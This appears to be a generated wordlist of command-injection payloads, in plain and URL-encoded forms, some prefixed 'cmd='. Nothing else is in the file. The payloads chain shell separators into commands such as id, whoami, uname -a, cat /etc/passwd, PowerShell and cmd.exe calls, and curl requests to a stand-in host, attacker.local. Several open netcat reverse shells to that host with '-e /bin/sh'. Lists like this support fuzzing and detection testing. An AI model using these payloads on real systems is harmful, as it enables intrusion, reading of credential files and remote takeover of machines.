%26%26%20curl%20http%3A%2F%2Fattacker.local%2F131
%26%26%20curl%20http%3A%2F%2Fattacker.local%2F136
%26%26%20curl%20http%3A%2F%2Fattacker.local%2F155
%26%26%20curl%20http%3A%2F%2Fattacker.local%2F164
%26%26%20curl%20http%3A%2F%2Fattacker.local%2F174
%26%26%20curl%20http%3A%2F%2Fattacker.local%2F196
%26%26%20curl%20http%3A%2F%2Fattacker.local%2F60
%26%26%20curl%20http%3A%2F%2Fattacker.local%2F87
%26%26%20id%20109
%26%26%20id%20120
%26%26%20id%20131
%26%26%20id%20148
%26%26%20id%2026
%26%26%20id%2074
%26%26%20powershell%20-Command%20%22whoami%20101%22
%26%26%20powershell%20-Command%20%22whoami%20146%22
%26%26%20powershell%20-Command%20%22whoami%20156%22
%26%26%20powershell%20-Command%20%22whoami%20166%22
%26%26%20powershell%20-Command%20%22whoami%2029%22
%26%26%20powershell%20-Command%20%22whoami%2042%22
%26%26%20powershell%20-Command%20%22whoami%2084%22
%3B%20%2Fbin%2Fsh%20-c%20%27id%20126%27
%3B%20%2Fbin%2Fsh%20-c%20%27id%20169%27
%3B%20%2Fbin%2Fsh%20-c%20%27id%20178%27
%3B%20%2Fbin%2Fsh%20-c%20%27id%20187%27
%3B%20%2Fbin%2Fsh%20-c%20%27id%2025%27
%3B%20%2Fbin%2Fsh%20-c%20%27id%2047%27
%3B%20%2Fbin%2Fsh%20-c%20%27id%2054%27
%3B%20%2Fbin%2Fsh%20-c%20%27id%2055%27
%3B%20%2Fbin%2Fsh%20-c%20%27id%2082%27
%3B%20uname%20-a%20%23112
%3B%20uname%20-a%20%2317
%3B%20uname%20-a%20%23170
%3B%20uname%20-a%20%23178
%3B%20uname%20-a%20%2330
%3B%20uname%20-a%20%2336
%3B%20uname%20-a%20%2367
%3B%20whoami%20108
%3B%20whoami%20114
%3B%20whoami%20146
%3B%20whoami%20181
%3B%20whoami%205
%7C%20cat%20%2Fetc%2Fpasswd%20%23100
%7C%20cat%20%2Fetc%2Fpasswd%20%23107
%7C%20cat%20%2Fetc%2Fpasswd%20%23138
%7C%20cat%20%2Fetc%2Fpasswd%20%2317
%7C%20cat%20%2Fetc%2Fpasswd%20%2335
%7C%20cat%20%2Fetc%2Fpasswd%20%2379
%7C%20cat%20%2Fetc%2Fpasswd%20%239
%7C%20nc%20attacker.local%204015%20-e%20%2Fbin%2Fsh
%7C%20nc%20attacker.local%204016%20-e%20%2Fbin%2Fsh
%7C%20nc%20attacker.local%204035%20-e%20%2Fbin%2Fsh
%7C%20nc%20attacker.local%204063%20-e%20%2Fbin%2Fsh
%7C%20nc%20attacker.local%204072%20-e%20%2Fbin%2Fsh
%7C%7C%20cmd.exe%20%2Fc%20whoami%20100
%7C%7C%20cmd.exe%20%2Fc%20whoami%20140
%7C%7C%20cmd.exe%20%2Fc%20whoami%20141
%7C%7C%20cmd.exe%20%2Fc%20whoami%20177
%7C%7C%20cmd.exe%20%2Fc%20whoami%20183
%7C%7C%20cmd.exe%20%2Fc%20whoami%2066
%7C%7C%20cmd.exe%20%2Fc%20whoami%2094
%7C%7C%20cmd.exe%20%2Fc%20whoami%2096
&& curl http://attacker.local/164
&& curl http://attacker.local/189
&& curl http://attacker.local/77
&& id 105
&& id 142
&& id 168
&& id 173
&& id 34
&& id 54
&& id 71
&& id 79
&& powershell -Command "whoami 145"
&& powershell -Command "whoami 175"
&& powershell -Command "whoami 39"
&& powershell -Command "whoami 68"
&& powershell -Command "whoami 74"
&& powershell -Command "whoami 76"
&& powershell -Command "whoami 86"
; /bin/sh -c 'id 109'
; /bin/sh -c 'id 119'
; /bin/sh -c 'id 131'
; /bin/sh -c 'id 138'
; /bin/sh -c 'id 166'
; /bin/sh -c 'id 17'
; /bin/sh -c 'id 186'
; /bin/sh -c 'id 195'
; /bin/sh -c 'id 57'
; /bin/sh -c 'id 64'
; uname -a #108
; uname -a #198
; uname -a #60
; whoami 119
; whoami 127
; whoami 136
; whoami 16
; whoami 175
; whoami 189
; whoami 2
; whoami 200
; whoami 21
; whoami 59
; whoami 62
; whoami 82
; whoami 89
cmd=%26%26%20curl%20http%3A%2F%2Fattacker.local%2F106
cmd=%26%26%20curl%20http%3A%2F%2Fattacker.local%2F116
cmd=%26%26%20curl%20http%3A%2F%2Fattacker.local%2F152
cmd=%26%26%20curl%20http%3A%2F%2Fattacker.local%2F158
cmd=%26%26%20curl%20http%3A%2F%2Fattacker.local%2F188
cmd=%26%26%20curl%20http%3A%2F%2Fattacker.local%2F200
cmd=%26%26%20curl%20http%3A%2F%2Fattacker.local%2F52
cmd=%26%26%20curl%20http%3A%2F%2Fattacker.local%2F96
cmd=%26%26%20id%20164
cmd=%26%26%20id%20166
cmd=%26%26%20id%20182
cmd=%26%26%20id%20193
cmd=%26%26%20id%205
cmd=%26%26%20id%208
cmd=%26%26%20id%2098
cmd=%26%26%20powershell%20-Command%20%22whoami%2011%22
cmd=%26%26%20powershell%20-Command%20%22whoami%20134%22
cmd=%26%26%20powershell%20-Command%20%22whoami%20156%22
cmd=%26%26%20powershell%20-Command%20%22whoami%20160%22
cmd=%26%26%20powershell%20-Command%20%22whoami%2068%22
cmd=%26%26%20powershell%20-Command%20%22whoami%2070%22
cmd=%26%26%20powershell%20-Command%20%22whoami%2078%22
cmd=%26%26%20powershell%20-Command%20%22whoami%2080%22
cmd=%26%26%20powershell%20-Command%20%22whoami%2084%22
cmd=%26%26%20powershell%20-Command%20%22whoami%2085%22
cmd=%26%26%20powershell%20-Command%20%22whoami%2096%22
cmd=%26%26%20powershell%20-Command%20%22whoami%2098%22
cmd=%3B%20%2Fbin%2Fsh%20-c%20%27id%20122%27
cmd=%3B%20%2Fbin%2Fsh%20-c%20%27id%20186%27
cmd=%3B%20%2Fbin%2Fsh%20-c%20%27id%2032%27
cmd=%3B%20%2Fbin%2Fsh%20-c%20%27id%2079%27
cmd=%3B%20ping%20-c%204%20127.0.0.1
cmd=%3B%20uname%20-a%20%23122
cmd=%3B%20uname%20-a%20%23129
cmd=%3B%20uname%20-a%20%23172
cmd=%3B%20uname%20-a%20%23180
cmd=%3B%20uname%20-a%20%2391
cmd=%3B%20whoami%20109
cmd=%3B%20whoami%20115
cmd=%3B%20whoami%20121
cmd=%3B%20whoami%20123
cmd=%3B%20whoami%2075
cmd=%3B%20whoami%2098
cmd=%7C%20cat%20%2Fetc%2Fpasswd%20%23140
cmd=%7C%20cat%20%2Fetc%2Fpasswd%20%2327
cmd=%7C%20cat%20%2Fetc%2Fpasswd%20%2378
cmd=%7C%20cat%20%2Fetc%2Fpasswd%20%2393
cmd=%7C%20nc%20attacker.local%204009%20-e%20%2Fbin%2Fsh
cmd=%7C%20nc%20attacker.local%204011%20-e%20%2Fbin%2Fsh
cmd=%7C%20nc%20attacker.local%204018%20-e%20%2Fbin%2Fsh
cmd=%7C%20nc%20attacker.local%204066%20-e%20%2Fbin%2Fsh
cmd=%7C%7C%20cmd.exe%20%2Fc%20whoami%20120
cmd=%7C%7C%20cmd.exe%20%2Fc%20whoami%20147
cmd=%7C%7C%20cmd.exe%20%2Fc%20whoami%20155
cmd=%7C%7C%20cmd.exe%20%2Fc%20whoami%2060
cmd=%7C%7C%20cmd.exe%20%2Fc%20whoami%2067
| cat /etc/passwd #114
| cat /etc/passwd #139
| cat /etc/passwd #141
| cat /etc/passwd #157
| cat /etc/passwd #177
| cat /etc/passwd #25
| cat /etc/passwd #44
| cat /etc/passwd #6
| nc attacker.local 4012 -e /bin/sh
| nc attacker.local 4053 -e /bin/sh
| nc attacker.local 4069 -e /bin/sh
|| cmd.exe /c whoami 155
|| cmd.exe /c whoami 53
|| cmd.exe /c whoami 58
|| cmd.exe /c whoami 7
|| cmd.exe /c whoami 8
|| cmd.exe /c whoami 87
|| cmd.exe /c whoami 9
